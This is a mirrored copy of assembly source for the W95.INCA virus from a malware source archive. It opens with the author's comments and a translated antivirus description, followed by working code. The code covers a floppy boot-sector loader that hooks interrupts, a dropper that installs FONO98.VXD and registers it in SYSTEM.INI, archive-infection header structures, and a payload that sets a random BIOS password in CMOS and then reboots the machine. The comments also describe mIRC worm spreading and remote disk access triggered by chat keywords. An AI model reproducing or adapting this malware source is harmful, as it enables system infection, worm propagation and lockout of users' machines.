mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 11:55:26 +00:00
2930 lines
92 KiB
NASM
2930 lines
92 KiB
NASM
;[W95.INCA] Multipartite PE/BOOT polymorphic mIRC spreading infector
|
|
;Copyright 1998 (c) Vecna
|
|
;
|
|
;This is my first attempt at w95 plataform. Is a multipartite infector of PE
|
|
;filez, focused in fast spreading. It infect PE files by adding a new section
|
|
;randomly named and a polymorphic VxD-dropper. It infect ARJ/ZIP/RAR/LHA/PAK
|
|
;by adding a random named COM dropper, encripted by a polymorphic loop. It
|
|
;infect boot of floppies by adding a polymorphic loader to their boot sectorz.
|
|
;It spread over internet using DCC protocol provided by mIRC, using a worm to
|
|
;spread over channelz. In the internet part is also the payload activation.
|
|
;
|
|
;The polymorphic decriptor in PE files isnt based in math instructionz, but
|
|
;in swapping. This novel technic of encription should provide problemz to
|
|
;disinfection and detection i hope, as not the whole code is "encripted" , but
|
|
;just some chunkz. The polymorphic decriptor is filled by lotz of conditionalz
|
|
;and unconditional jumpz.
|
|
;
|
|
;The polymorphic engine that generate the droppers and the boot loader keep
|
|
;track of the contentz of all regz and flagz, as in advanced engines as
|
|
;Uruguay or Level3. This mean that if i need AX holding 0x0202, as for load 2
|
|
;sectorz in the boot loader, i can obtain this values using XOR AX, ??? or
|
|
;ADD AX, ??? and like.
|
|
;
|
|
;This source isnt compilable as is. Use the pre-compiled virus.
|
|
;
|
|
;
|
|
;Here's the description of w95/Inca by DrWeb, translated from russian to
|
|
;english by Lurker (thankz!!)
|
|
;
|
|
;
|
|
;Win95. Inca
|
|
;
|
|
; Dangerous resident polymorphic multipartite virus. Win95.Inca
|
|
; infects EXE files in a format of PE (Portable Executable) for
|
|
; operation systems Windows95/98 and boot sectors of floppy
|
|
; disks. And also Win95.Inca is a virus-worm for ARJ, LHA, LZH,
|
|
; PAK, RAR and ZIP-archives and for the mIRC32 program.
|
|
;
|
|
; When infected PE file is started, the virus receives management
|
|
; and polymorphic decryptor deciphers the base code of a virus.
|
|
; And this decoding is made by enough unusual way - in initial variant
|
|
; the base virus code will contatin the table of indexes or displacements
|
|
; of original bytes in the virus body. And it is necessary to understand
|
|
; that decoding in this case will be substitution or compilation
|
|
; original bytes on place of their one-byte indexes or displacements.
|
|
; After given "assembly" of the code, virus determines (by
|
|
; "already standard" for this type of viruses algorithm) the address
|
|
; of interesting for it functions in KERNEL32.DLL and creates
|
|
; a file C:\W95INCA.COM, in which file virus writes a polymorphic
|
|
; DOS COM dropper.
|
|
;
|
|
; This polymorphic 16bit DOS-code is already generated on infection of
|
|
; the PE EXE-file, and because of that any "additional efforts" for
|
|
; creation of a polymorphic copies on the given stage are not undertaken.
|
|
; Then the created file is closed.
|
|
; This dropper file is executed by the virus and then, after some delay,
|
|
; deleted. Further the virus returnes back management to the
|
|
; infected host PE-file.
|
|
; This is all actions, which carries out a virus code in the PE EXE-file.
|
|
; Therefore, it is possible to consider all infected PE EXE-files, as
|
|
; droppers.
|
|
;
|
|
; The C:\W95INCA.COM file, executed by the virus, determines Windows
|
|
; directory (WINDIR) and tries to create in the \WINDOWS\SYSTEM folder
|
|
; a file with the name FONO98.VXD.
|
|
; If this attempt is successful, the virus unpacks
|
|
; with the elementary algorithm, a code of the 32bit VxD-driver,
|
|
; which is contained inside of the 16bit DOS-code, and writes it in
|
|
; this newly created FONO98.VXD file.
|
|
;
|
|
; Further virus opens a configuration Windows file SYSTEM.INI, searches
|
|
; in it for the section "[386Enh]" and just below this line
|
|
; writes a line "device=fono98.vxd".
|
|
;
|
|
; After described manipulations, or, if the line "device=fono98.vxd"
|
|
; is already is present in the SYSTEM.INI, or file FONO98.VXD
|
|
; was created earlier in the \WINDOWS\SYSTEM folder, or,
|
|
; if it wasn't possible to find the WINDOWS folder, virus finishes its
|
|
; work and returns management to DOS.
|
|
;
|
|
; After the system reboot and on the next startof Windows virus
|
|
; VxD-driver FONO98.VXD is loaded by the system into a memory and
|
|
; runned.
|
|
;
|
|
; In a first task, the virus driver deletes system VxD-driver HSFLOP.PDR
|
|
; in the catalogue \WINDOWS\SYSTEM\IOSUBSYS folder. Then virus reads
|
|
; in memory a code from its own FONO98.VXD and creates in memory
|
|
; three different polymorphic copies: for infection PE EXE-files,
|
|
; for infection of boot-sectors of floppies and for creation of
|
|
; 16bit DOS droppers in a format of COM-files.
|
|
; Futher, in a current session, and untill the next system reboot,
|
|
; virus will infect the specified objects only with these copies.
|
|
;
|
|
; Win95.Inca concerns to a class of the "slow polymorpics".
|
|
; Further virus "intercepts" IFSMgr FileSystemApiHook and Int 13h
|
|
; (disk operations), establishing on them its own events handlers.
|
|
;
|
|
; IFSMgr handler of the virus supervises opening files. On the
|
|
; opening files with extensions EXE and SCR, virus checks their
|
|
; internal format, and if the opening files are Portable Executable,
|
|
; virus infects them, by creating additional code section with a
|
|
; random name in the header of PE-file and writing in its area virus
|
|
; polymorphic code. On opening of archive files with the extensions
|
|
; LHA, LZH, PAK, ZIP, ARJ or RAR, the virus adds to the given
|
|
; archives its 16bit polymorphic code (worm) in a format of COM-file,
|
|
; also modifies header of the archive files in such a manner that
|
|
; the this virus-worm appears placed in the archive in a unpacked
|
|
; form (store format) also receives a random name, consisting from
|
|
; four letters, and with the extension COM or EXE (for example, AAAA.COM
|
|
; or ABCD.EXE). On opening of the MIRC32.EXE file (program for
|
|
; "chat" over the Internet) the virus writes or adds in the end
|
|
; of the configuration file MIRC.INI, line " [fileserver]" and
|
|
; "Warning = Off".
|
|
;
|
|
; Also virus creates a new (if they exist on a disk) files SCRIPT.OLD,
|
|
; SCRIPT.INI, INCA.EXE and REVENGE.COM.
|
|
; In the file INCA.EXE, virus writes a code of the polymorphic 16bit
|
|
; virus-worm. In the file REVENGE.COM - 231 bytes of the trojan code,
|
|
; that rewrites the content of the CMOS-memory.
|
|
; [*Authors Note - It put a password in AMI/AWARD BIOS*]
|
|
;
|
|
; And in the file SCRIPT.INI virus writes text of the virus MIRC-worm.
|
|
;
|
|
; On start of the MIRC32.INI under scenario of the SCRIPT.INI,
|
|
; it runs the file INCA.EXE. Further under the same scenario it
|
|
; tries to send files SCRIPT.INI (mIRC-worm) and INCA.EXE (virus
|
|
; dropper) to computers of all members of the "chat conversation" in
|
|
; the Internet.
|
|
; If during the chat there will appaer a text string "El_inca",
|
|
; under the scenario of the SCRIPT.INI - trojan program REVENGE.COM
|
|
; will be launched. If somebody will "tell a word" "ancev",
|
|
; the virus script "will allow" him to access disk drive C:.
|
|
; Even if this person is for several thousand miles from the infected
|
|
; computer.
|
|
;
|
|
; And if at the time of "conversation" there will appear a text
|
|
; "_29A_", the program MIRC32.EXE will self-exits.
|
|
;
|
|
; Virus handler of the disk operations on the Int 13h, supervises
|
|
; the reading of the boot sectors of the floppes in the drive A:
|
|
; and on an opportunity infects them, by replacing the original
|
|
; boot loader with polymorphic, and writing on a disk its own
|
|
; copies.
|
|
;
|
|
; On a booting from such infected floppy, virus loader will
|
|
; receive management, and will read to memory all sectors with the
|
|
; virus code, "will intercept" Int 1Ch (timer), and then Int 21h.
|
|
; A task of the Int21h handler is simple - on the first
|
|
; opportunity, it tries to create FONO98.VXD in the
|
|
; C:\WINDOWS\SYSTEM folder and to register
|
|
; it in the SYSTEM.INI configuration file (in the "[386Enh]" section).
|
|
; The task is exactly the same, as well as performed by a
|
|
; C:\W95INCA.COM file-dropper, algorithm of which was
|
|
; described in the beginning.
|
|
; A difference only that the dropper C:\W95INCA.COM determines
|
|
; the lochation of Windows system folder fome a variable WINDIR.
|
|
; And Int21h handler tries to place dropper in the C:\WINDOWS\SYSTEM
|
|
; folder.
|
|
; After the given attempt (successful or not) the virus
|
|
; "releases" Int21h and neutralizes its own copy in memory.
|
|
;
|
|
; The virus contains text "El Inca virus".
|
|
;
|
|
; The size of the virus VxD-driver is 15327 bytes.
|
|
;
|
|
; So, all infected objects can be considered as virus-hosts or droppers,
|
|
; except created by the virus VxD-driver.
|
|
; This VxD-driver installs virus copy in memory, and hits all other
|
|
; objects. However you see that it does not infect
|
|
; "similar to itself" VxD-drivers. VxD-driver is only the carrier
|
|
; of an infection, but it is not an infected object.
|
|
;
|
|
|
|
|
|
MINSIZEINFECT EQU 8*1024 ;zopy me - i want to trawel
|
|
|
|
|
|
BPB STRUC
|
|
bpb_jmp db 3 dup (?)
|
|
bpb_oem db 8 dup (?)
|
|
bpb_b_s dw ?
|
|
bpb_s_c db ?
|
|
bpb_r_s dw ?
|
|
bpb_n_f db ?
|
|
bpb_r_e dw ?
|
|
bpb_t_s dw ?
|
|
bpb_m_d db ?
|
|
bpb_s_f dw ?
|
|
bpb_s_t dw ?
|
|
bpb_n_h dw ?
|
|
bpb_h_d dw ?
|
|
bpb_sht db 20h dup (?)
|
|
BPB ENDS
|
|
|
|
.386p
|
|
.XLIST
|
|
Include Vmm.Inc
|
|
Include Ifs.Inc
|
|
Include Ifsmgr.Inc
|
|
.LIST
|
|
|
|
Declare_Virtual_Device FONO98, 1, 0, FONO98_Control, Undefined_Device_ID,,,
|
|
|
|
VxD_Locked_Code_Seg
|
|
|
|
IncaName db 'INCA.EXE', 0 ;Vars used by the virus
|
|
NextHook dd 0
|
|
FileHandle dd 0
|
|
FileSize dd 0
|
|
FileAttr dd 0
|
|
Pad dd 0
|
|
BufferOneHandle dd 0
|
|
BufferTwoHandle dd 0
|
|
VxDCompressedBuffer dd 0
|
|
VxDCompressedSize dd 0
|
|
PolyBootSize dd 0
|
|
PolyBootBuffer dd 0
|
|
PolyDOSFileBuffer dd 0
|
|
PolyDOSFileSize dd 0
|
|
PolyPESize dd 0
|
|
PolyPEBuffer dd 0
|
|
VMF_handle dd 0
|
|
VMF_size dd 0
|
|
VMF_base dd 0
|
|
OurFile db 0
|
|
FloppyInUse db 0
|
|
UpDown db 0
|
|
Compressed db 0
|
|
CrpTbl db 200h dup (0)
|
|
SectorBuffer Equ This Byte
|
|
CrcTab db 2048 dup (0)
|
|
FileName Equ This Byte
|
|
VMM32Path db MAX_PATH dup (0)
|
|
|
|
|
|
|
|
ZIPRHeaderId db 'PK' ;Structures used when
|
|
ZIPRSignature db 01, 02 ;infecting archivers
|
|
ZIPRVerMade dw 10
|
|
ZIPRVerNeed dw 0ah
|
|
ZIPRFlags dw 0
|
|
ZIPRMethod dw 0
|
|
ZIPRTimeDate dd 12345678h
|
|
ZIPRCRC32 dd 0
|
|
ZIPRCompressed dd 0
|
|
ZIPRUncompressed dd 0
|
|
ZIPRSizeFilename dw ZIPRNameLenght
|
|
ZIPRExtraField dw 0
|
|
ZIPRCommentSize dw 0
|
|
ZIPRDiskNumba dw 0
|
|
ZIPRInternalAttr dw 01
|
|
ZIPRExternalAttr dd 21h
|
|
ZIPROffsetLHeaderR dd 0
|
|
ZIPRFilename db 'AAAA.COM'
|
|
ZIPRNameLenght Equ This Byte - offset32 ZIPRFilename
|
|
ZIPRHeaderSize Equ This Byte - offset32 ZIPRHeaderId
|
|
|
|
ZIPLHeaderId db 'PK'
|
|
ZIPLSignature dw 0403h
|
|
ZIPLVersionNeed dw 0010
|
|
ZIPLFlags dw 80h
|
|
ZIPLMethod dw 0
|
|
ZIPLDateTime dd 12345678h
|
|
ZIPLCRC32 dd 0
|
|
ZIPLCompressed dd 0
|
|
ZIPLUncompressed dd 0
|
|
ZIPLSizeFilename dw ZIPLNameLenght
|
|
ZIPLExtraField dw 0
|
|
ZIPLFilename db 'AAAA.COM'
|
|
ZIPLNameLenght Equ This Byte - offset32 ZIPLFilename
|
|
|
|
ZIPReadBuffer Equ This Byte
|
|
ZIPEHeaderId db 'PK'
|
|
ZIPSignature dw 0
|
|
ZIPNoDisk dw 0
|
|
ZIPNoStartDisk dw 0
|
|
ZIPEntryDisk dw 0
|
|
ZIPEntrysDir dw 0
|
|
ZIPSizeDir dd 0
|
|
ZIPOffsetDir dd 0
|
|
ZIPCommentLenght dw 0
|
|
ZIPEHeaderSize Equ This Byte - offset32 ZIPEHeaderId
|
|
|
|
ARJHeaderId dw 0ea60h
|
|
ARJHeaderSize dw offset32 ARJHeaderCRC-offset32 ARJ1HeaderSize
|
|
ARJ1HEaderSize db offset32 ARJFilename-offset32 ARJ1HeaderSize
|
|
ARJVersionDone db 6
|
|
ARJVersionNeed db 1
|
|
ARJHostOS db 0
|
|
ARJFlags db 0
|
|
ARJMethod db 0
|
|
ARJType db 0
|
|
ARJReserved db 0
|
|
ARJDateTime dd 12345678h
|
|
ARJCompressedSize dd 0
|
|
ARJUncompressedSize dd 0
|
|
ARJFileCRC dd 0
|
|
ARJEntryname dw 0
|
|
ARJAccessMode dw 21h
|
|
ARJHostData dw 0
|
|
ARJFilename db 'AAAA.COM',0
|
|
ARJComment db 0
|
|
ARJHeaderCRC dd 0
|
|
ARJExtHeader dw 0
|
|
ARJEnd dw 0ea60h, 0000h
|
|
|
|
RARHeaderCRC dw 0
|
|
RARHeaderType db 74h
|
|
RARFileFlags dw 08000h
|
|
RARHeaderSize dw offset32 RARHeaderEnd - offset32 RARHeaderCRC
|
|
RARCompressedSize dd 0
|
|
RARUncompressedSize dd 0
|
|
RARHostOS db 0
|
|
RARFileCRC dd 0
|
|
RARDateTime dd 12345678h
|
|
RARVersionNeed db 14h
|
|
RARMethod db 30h
|
|
RARFileNameSize dw offset32 RARHeaderEnd - offset32 RARFileName
|
|
RARFileAttribute dd 21h
|
|
RARFileName db 'AAAA.COM'
|
|
RARHeaderEnd Equ This Byte
|
|
|
|
LHASig db LHAHeaderSize-2
|
|
LHAHeaderCRC db 0
|
|
LHAMethod db '-lh0-'
|
|
LHACompressedSize dd 0
|
|
LHAUncompressedSize dd 0
|
|
LHADateTime dd 12345678h
|
|
LHAFlags dw 120h
|
|
LHANameLenght db offset32 LHASizeFilename - offset32 LHAFilename
|
|
LHAFilename db 'AAAA.COM'
|
|
LHASizeFilename Equ This Byte
|
|
LHACRC16 dw 0
|
|
LHAStuff db 'M'
|
|
LHAStuff2 dw 0
|
|
LHAHeaderSize Equ This Byte - offset32 LHASig
|
|
|
|
|
|
|
|
MyVxDName db "FONO98.VXD",0
|
|
SizeVxDName Equ This Byte - offset32 MyVxDName
|
|
|
|
FloppyVxD db "IOSUBSYS\HSFLOP.PDR", 0
|
|
SizeFloppyVxDName Equ This Byte - offset32 FloppyVxD
|
|
|
|
|
|
|
|
BootLoaderSize Equ BootLoaderEnd-BootLoader
|
|
BootLoader: ;This code is inserted in
|
|
cli ;0/1/15 in 1.44 floppies
|
|
xor ax, ax
|
|
mov ss, ax
|
|
mov sp, 7c00h ;It is loaded by the
|
|
sti ;polymorphic loader inserted
|
|
cld ;in the boot code
|
|
mov ds, ax
|
|
dec word ptr ds:[413h]
|
|
int 12h ;reserve 1kb and copy ourself
|
|
ror ax, 10 ;to the reserved hole
|
|
mov es, ax
|
|
call delta
|
|
delta:
|
|
pop si
|
|
push ds
|
|
sub si, offset delta ;full of bugs and hardcoded
|
|
xor di, di ;references, as you can see :(
|
|
push cs
|
|
mov cx, 200h
|
|
pop ds
|
|
rep movsw ;copy 1kb of code
|
|
pop ds
|
|
push es
|
|
push offset hstart
|
|
retf ;continue in TOM
|
|
hstart:
|
|
xor ax, ax
|
|
mov es, ax
|
|
mov ax, 0201h
|
|
mov cx, 0001h
|
|
mov dx, 0180h
|
|
mov bx, 7c00h
|
|
int 13h ;read HDD boot sector
|
|
cmp word ptr [bx+3h], 'SM'
|
|
jne fuck
|
|
cmp word ptr [bx+1f1h], 'IW'
|
|
jne fuck
|
|
xor eax, eax
|
|
mov ds, ax
|
|
mov dword ptr ds:[21h*4], eax ;initialize int21
|
|
mov ax, offset int1c
|
|
mov si, 1ch*4
|
|
mov di, offset old1c
|
|
cli
|
|
xchg ax, word ptr ds:[si]
|
|
push cs
|
|
pop es
|
|
stosw
|
|
mov ax, cs
|
|
xchg ax, word ptr ds:[si+2] ;hook int1c
|
|
stosw
|
|
sti
|
|
fuck:
|
|
cld
|
|
xor ax, ax
|
|
mov di, offset loader
|
|
mov cx, offset fuck-offset loader
|
|
rep stosb ;wipe some parts of loader
|
|
db 0eah ;from memory to reduce
|
|
dw 7c00h ;footprints
|
|
dw 0
|
|
Zopy0:
|
|
push cs
|
|
cld
|
|
mov di, offset int1c
|
|
mov cx, offset int1c-offset e_vxd
|
|
sub ax, ax
|
|
pop es
|
|
rep stosb ;wipe all virus loader code
|
|
no_4b00: ;(less some bytes)
|
|
popad
|
|
pop es
|
|
pop ds
|
|
int 0ffh
|
|
retf 2
|
|
int1c:
|
|
push ds
|
|
pushad
|
|
push 0
|
|
pop ds
|
|
mov cx, word ptr ds:[21h*4+2]
|
|
db 081h, 0f9h ;cmp cx, 0
|
|
dw 0
|
|
i1c_check equ word ptr $ -2
|
|
je not_yet ;did int21 seg changed?
|
|
mov word ptr cs:[i1c_check], cx
|
|
mov cx, 0
|
|
time_2 equ word ptr $ -2
|
|
inc word ptr cs:[time_2] ;increase number of changes
|
|
cmp cl, 3
|
|
jnz not_yet ;changed 3 times?
|
|
mov esi, 21h*4
|
|
mov edi, 0ffh*4
|
|
mov eax, dword ptr ds:[esi]
|
|
mov dword ptr ds:[edi], eax ;copy int21 to int0ff
|
|
mov ax, cs
|
|
rol eax, 16
|
|
mov ax, offset int21
|
|
mov dword ptr ds:[esi], eax ;hook int21 to our code
|
|
mov eax, dword ptr cs:[old1c]
|
|
mov dword ptr ds:[1ch*4], eax ;restore int1c
|
|
not_yet:
|
|
popad
|
|
pop ds
|
|
db 0eah
|
|
old1c dd 0
|
|
read_vxd:
|
|
mov ax, 8000h ;if the floppy was retired,
|
|
mov ds, ax ;shit happen... :(
|
|
mov es, ax
|
|
sub bx, bx
|
|
mov dx, 0000h
|
|
call read_last_track ;read 79/0/1 and 79/1/1 to
|
|
jc error ;mem
|
|
mov dx, 0100h
|
|
add bx, (18*512)
|
|
read_last_track: ;init FDD controller
|
|
sub ax, ax
|
|
int 13h
|
|
mov ax, 0212h
|
|
mov cx, 4f01h
|
|
int 13h ;read track(head is selected
|
|
error: ;above)
|
|
ret
|
|
int21:
|
|
push ds
|
|
push es
|
|
pushad
|
|
push 0
|
|
pop ds
|
|
cmp ax, 4b00h ;is first exec?
|
|
jne no_4b00
|
|
mov eax, dword ptr ds:[0ffh*4]
|
|
mov dword ptr ds:[21h*4], eax ;restore int21
|
|
cld
|
|
call infect_system ;drop our vxd
|
|
jmp Zopy0 ;and wipe loader out of mem
|
|
infect_system:
|
|
call read_vxd
|
|
jc error
|
|
sub si, si ;RLE compressed vxd is in mem
|
|
mov di, ((18*512)*2)
|
|
mov cx, word ptr cs:[c_vxd]
|
|
call uncompress16 ;uncompress VXD
|
|
push cs
|
|
pop ds
|
|
call vxd
|
|
db 'C:\WINDOWS\SYSTEM\FONO98.VXD', 0
|
|
vxd: ;when i said hardcoded
|
|
pop dx ;reference, is this i mean :((
|
|
mov ah, 5bh
|
|
mov cx, 11b
|
|
int 0ffh ;only create if not exists
|
|
jc error
|
|
xchg ax, bx
|
|
push es
|
|
pop ds
|
|
mov cx, word ptr cs:[e_vxd]
|
|
mov ah, 40h
|
|
mov dx, ((18*512)*2)
|
|
int 0ffh ;write uncompressed vxd
|
|
jc close
|
|
mov ah, 3eh
|
|
int 0ffh
|
|
push cs
|
|
call system
|
|
db 'C:\WINDOWS\SYSTEM.INI', 0 ;another hardcoded reference :(
|
|
system:
|
|
pop dx
|
|
pop ds
|
|
mov ax, 3d02h
|
|
int 0ffh ;modify system.ini
|
|
jc error
|
|
mov ax, 8000h
|
|
mov ds, ax
|
|
sub dx, dx
|
|
mov ah, 3fh
|
|
mov cx, -1
|
|
int 0ffh
|
|
jc close ;read whole system.ini
|
|
push cs
|
|
pop es
|
|
mov si, dx
|
|
mov di, offset enh386
|
|
mov cx, 10
|
|
search:
|
|
push di
|
|
push si
|
|
push cx
|
|
rep cmpsb ;search for [Enh386] section
|
|
je found
|
|
pop cx
|
|
pop si
|
|
pop di
|
|
inc si
|
|
dec ax
|
|
jnz search
|
|
jmp close
|
|
found:
|
|
add sp, 6
|
|
mov di, ax
|
|
pusha
|
|
mov di, offset device
|
|
mov cx, 19
|
|
rep cmpsb ;we are already registered?
|
|
popa
|
|
je close
|
|
mov dx, si
|
|
mov ax, 4200h
|
|
int 0ffh
|
|
jc close
|
|
mov ah, 40h
|
|
mov cx, 19
|
|
mov dx, offset device
|
|
int 0ffh ;write our device line
|
|
jc close
|
|
mov ah, 40h
|
|
mov cx, di
|
|
mov dx, si
|
|
int 0ffh ;and rest of file
|
|
close:
|
|
mov ah, 3eh
|
|
int 0ffh
|
|
ret
|
|
uncompress16:
|
|
mov dx, di ;RLE decompression
|
|
push dx
|
|
mov bx, si
|
|
add bx, cx
|
|
next:
|
|
lodsb
|
|
or al, al
|
|
jne store
|
|
lodsw
|
|
mov cx, ax
|
|
xor ax, ax
|
|
rep stosb
|
|
dec di
|
|
store:
|
|
stosb
|
|
cmp di, 0ff00h
|
|
ja abortnow ;a safeguard to avoid mem
|
|
cmp si, bx ;overwriting
|
|
jbe next
|
|
abortnow:
|
|
pop bx
|
|
mov cx, di
|
|
sub cx, bx
|
|
ret
|
|
enh386 db '[386Enh]', 13, 10
|
|
device db 'device=fono98.vxd', 13, 10
|
|
VxDCompressSize dw 0
|
|
VxDOriginalSize dw 0
|
|
BootLoaderEnd Equ This Byte
|
|
|
|
LoaderSize Equ LoaderEnd-Loader
|
|
InfectWindows95 PROC ;This code is the main dropper
|
|
call Delta ;for the viral VXD
|
|
Delta:
|
|
pop bp
|
|
sub bp, offset Delta
|
|
mov es, es:[2ch] ;get environment
|
|
mov di, -1
|
|
SearchWINDIR:
|
|
inc di
|
|
cmp di, 1024
|
|
jae ReturnBack
|
|
cmp byte ptr es:[di], 'w' ;found a 'w'?
|
|
jne SearchWINDIR
|
|
push si
|
|
push di
|
|
lea si, [bp+offset WinDir]
|
|
mov cx, 7
|
|
rep cmpsb ;check if is windir=
|
|
pop di
|
|
pop si
|
|
jne SearchWINDIR ;if not, keep searching
|
|
add di, 7
|
|
mov word ptr [bp+WinDX], di
|
|
mov word ptr [bp+WinDS], es ;save windows directory
|
|
push es
|
|
pop ds
|
|
mov si, di
|
|
push cs
|
|
pop es
|
|
lea di, [bp+offset Buffer]
|
|
NextLetter:
|
|
lodsb
|
|
or al, al
|
|
je CopyString
|
|
stosb
|
|
jmp NextLetter ;copy win95 dir to buffer
|
|
CopyString:
|
|
push cs
|
|
pop ds
|
|
lea si, [bp+offset SysDir]
|
|
NextLetterAgain:
|
|
lodsb
|
|
stosb
|
|
or al, al
|
|
jnz NextLetterAgain ;append path and vxd name
|
|
push cs
|
|
push cs
|
|
pop es
|
|
pop ds
|
|
mov ah, 5bh
|
|
mov cx, 011b
|
|
lea dx, [bp+offset Buffer]
|
|
int 21h ;create vxd if it not exists
|
|
jc ReturnBack
|
|
push ax
|
|
lea si, [bp+offset EndLoader]
|
|
mov di, si
|
|
add di, 30000
|
|
mov cx, word ptr [bp+VxDSize1]
|
|
call Uncompress16 ;uncompress vxd
|
|
pop bx
|
|
mov ah, 40h
|
|
mov cx, word ptr [bp+VxDSize2]
|
|
int 21h ;write vxd
|
|
jc Close
|
|
mov ah, 3eh
|
|
int 21h
|
|
InfectSYSTEMINI:
|
|
mov si, word ptr [bp+WinDX]
|
|
mov ds, word ptr [bp+WinDS]
|
|
lea di, [bp+offset Buffer]
|
|
NextLtr:
|
|
lodsb
|
|
or al, al
|
|
je CopyStr
|
|
stosb
|
|
jmp NextLtr ;copy windows dir to buffer
|
|
CopyStr: ;again
|
|
push cs
|
|
pop ds
|
|
lea si, [bp+offset SysIni] ;append system.ini
|
|
NxtLetter:
|
|
lodsb
|
|
stosb
|
|
or al, al
|
|
jnz NxtLetter
|
|
mov ax,3d02h
|
|
lea dx, [bp+offset Buffer]
|
|
int 21h
|
|
jc ReturnBack ;open system.ini
|
|
xchg ax, bx
|
|
mov ah, 3fh
|
|
mov cx, -1
|
|
lea dx, [bp+offset VxDHere]
|
|
int 21h
|
|
jc Close
|
|
mov si, dx
|
|
lea di, [bp+offset Enh386]
|
|
mov cx, 10
|
|
Search:
|
|
push di
|
|
push si
|
|
push cx
|
|
rep cmpsb ;search for right section
|
|
je Found
|
|
pop cx
|
|
pop si
|
|
pop di
|
|
inc si
|
|
dec ax
|
|
jnz Search
|
|
jmp Close
|
|
Found:
|
|
add sp, 6
|
|
mov di, ax
|
|
pusha
|
|
lea di, [bp+offset Device]
|
|
mov cx, 19
|
|
rep cmpsb ;already infected?
|
|
popa
|
|
je Close
|
|
mov dx, si
|
|
sub dx, offset VxDHere
|
|
sub dx, bp
|
|
mov ax, 4200h
|
|
int 21h
|
|
jc Close
|
|
mov ah, 40h
|
|
mov cx, 19
|
|
lea dx, [bp+offset Device]
|
|
int 21h ;write our device line
|
|
jc Close
|
|
mov ah, 40h
|
|
mov cx, di
|
|
sub cx, 10h
|
|
mov dx, si
|
|
int 21h
|
|
Close:
|
|
mov ah, 3eh
|
|
int 21h
|
|
ReturnBack:
|
|
mov ax, 4c00h
|
|
int 21h ;exit to DOS
|
|
Uncompress16:
|
|
mov dx, di
|
|
push dx ;uncompress RLE
|
|
mov bx, si ;(hmm... a bit redundant...)
|
|
add bx, cx
|
|
Next:
|
|
lodsb
|
|
or al, al
|
|
jne Store
|
|
lodsw
|
|
mov cx, ax
|
|
xor ax, ax
|
|
rep stosb
|
|
dec di
|
|
Store:
|
|
stosb
|
|
cmp di, 0ff00h
|
|
ja AbortNow
|
|
cmp si, bx
|
|
jbe Next
|
|
AbortNow:
|
|
pop bx
|
|
mov cx, di
|
|
sub cx, bx
|
|
ret
|
|
Enh386 db '[386Enh]', 13, 10
|
|
Device db 'device=fono98.vxd', 13, 10
|
|
WinDir db 'windir='
|
|
SysIni db '\SYSTEM.INI', 0
|
|
SysDir db '\SYSTEM\'
|
|
VxDName db 'FONO98.VXD',0
|
|
WinDS dw 0
|
|
WinDX dw 0
|
|
UpDown db 0
|
|
Compressed db 0
|
|
Buffer db 64 dup(0)
|
|
VxDSize2 dw 0
|
|
VxDSize1 dw 0
|
|
EndLoader Equ This Byte
|
|
VxDHere Equ This Byte
|
|
LoaderEnd Equ This Byte
|
|
|
|
|
|
BeginProc Compress32
|
|
mov edx, esi ;compressor of modificated RLE
|
|
add edx, ecx ;coded in 32bit
|
|
xor eax, eax
|
|
xor ecx, ecx
|
|
push edi
|
|
@1:
|
|
lodsb
|
|
or al, al
|
|
jnz @2
|
|
inc ecx
|
|
jmp @1
|
|
@2:
|
|
or ecx, ecx
|
|
jz @4
|
|
@5:
|
|
push eax
|
|
xor eax, eax
|
|
stosb
|
|
xchg eax, ecx
|
|
stosw
|
|
pop eax
|
|
@4:
|
|
stosb
|
|
@6:
|
|
cmp esi, edx
|
|
jbe @1
|
|
@3:
|
|
pop edx
|
|
mov ecx, edi
|
|
sub ecx, edx
|
|
ret
|
|
EndProc Compress32
|
|
|
|
Killer db 'REVENGE.COM', 0
|
|
|
|
KCode Equ This Byte
|
|
Payload:
|
|
push 0f000h ;our copyrighted payload :)
|
|
pop es
|
|
xor di, di
|
|
mov cx, -1
|
|
scan:
|
|
pusha
|
|
mov si, offset award
|
|
mov cx, 5
|
|
repe cmpsb ;search ROM for AWARD signature
|
|
popa
|
|
jz award_psw
|
|
inc di
|
|
loop scan
|
|
mov ax, 002fh ;if not found, assume AMI BIOS
|
|
call read
|
|
mov bx, ax
|
|
mov al, 2dh
|
|
call step1
|
|
or al, 00010000b ;Put a random password in CMOS
|
|
call step2 ;memory, for ask it always,
|
|
mov al, 2fh ;and correct checksum
|
|
mov dh, bl
|
|
call write
|
|
mov al, 3eh
|
|
call read
|
|
mov ah, al
|
|
mov al, 3fh
|
|
call read
|
|
mov bx, ax
|
|
mov ax, 0038h
|
|
call rndpsw
|
|
mov al, 39h
|
|
call rndpsw
|
|
mov dh, bh
|
|
mov al, 3eh
|
|
call write
|
|
mov dh, bl
|
|
mov al, 3fh
|
|
call write
|
|
jmp hehehe
|
|
award_psw:
|
|
mov ax, 002fh
|
|
call read
|
|
mov bx, ax ;Put the password in CMOS
|
|
mov al, 11h ;for AWARD BIOS machines
|
|
call step1
|
|
or al, 00000001b
|
|
call step2
|
|
mov al, 1bh
|
|
call step1
|
|
or al, 00100000b
|
|
call step2
|
|
mov al, 2fh
|
|
mov dh, bl
|
|
call write
|
|
mov al, 7dh
|
|
call read
|
|
mov ah, al
|
|
mov al, 7eh
|
|
call read
|
|
mov bx, ax
|
|
mov ax, 0050h
|
|
call rndpsw ;for ask always, and correcting
|
|
mov al, 51h ;the checksum, of course :)
|
|
call rndpsw
|
|
mov dh, bh
|
|
mov al, 7dh
|
|
call write
|
|
mov dh, bl
|
|
mov al, 7eh
|
|
call write
|
|
hehehe:
|
|
sti ;reboot machine, so the user
|
|
mov al, 0feh ;notice the payload soon ;)
|
|
out 64h, al
|
|
jmp hehehe
|
|
read:
|
|
and al, 7fh ;CMOS read
|
|
out 70h, al
|
|
jmp $+2
|
|
jmp $+2
|
|
in al, 71h
|
|
ret
|
|
write:
|
|
and al, 7fh ;CMOS write
|
|
out 70h, al
|
|
jmp $+2
|
|
mov al, dh
|
|
out 71h, al
|
|
ret
|
|
rndpsw: ;make random password but
|
|
mov dh, al ;mantain correct checksum
|
|
call read
|
|
sub bx, ax
|
|
in al, 40h
|
|
add bx, ax
|
|
xchg al, dh
|
|
call write
|
|
ret
|
|
step1:
|
|
mov dh, al ;checksum
|
|
call read
|
|
sub bx, ax
|
|
ret
|
|
step2: ;checksum
|
|
add bx, ax
|
|
xchg al, dh
|
|
call write
|
|
ret
|
|
award db 'AWARD'
|
|
KCodeSize Equ $ - KCode
|
|
|
|
|
|
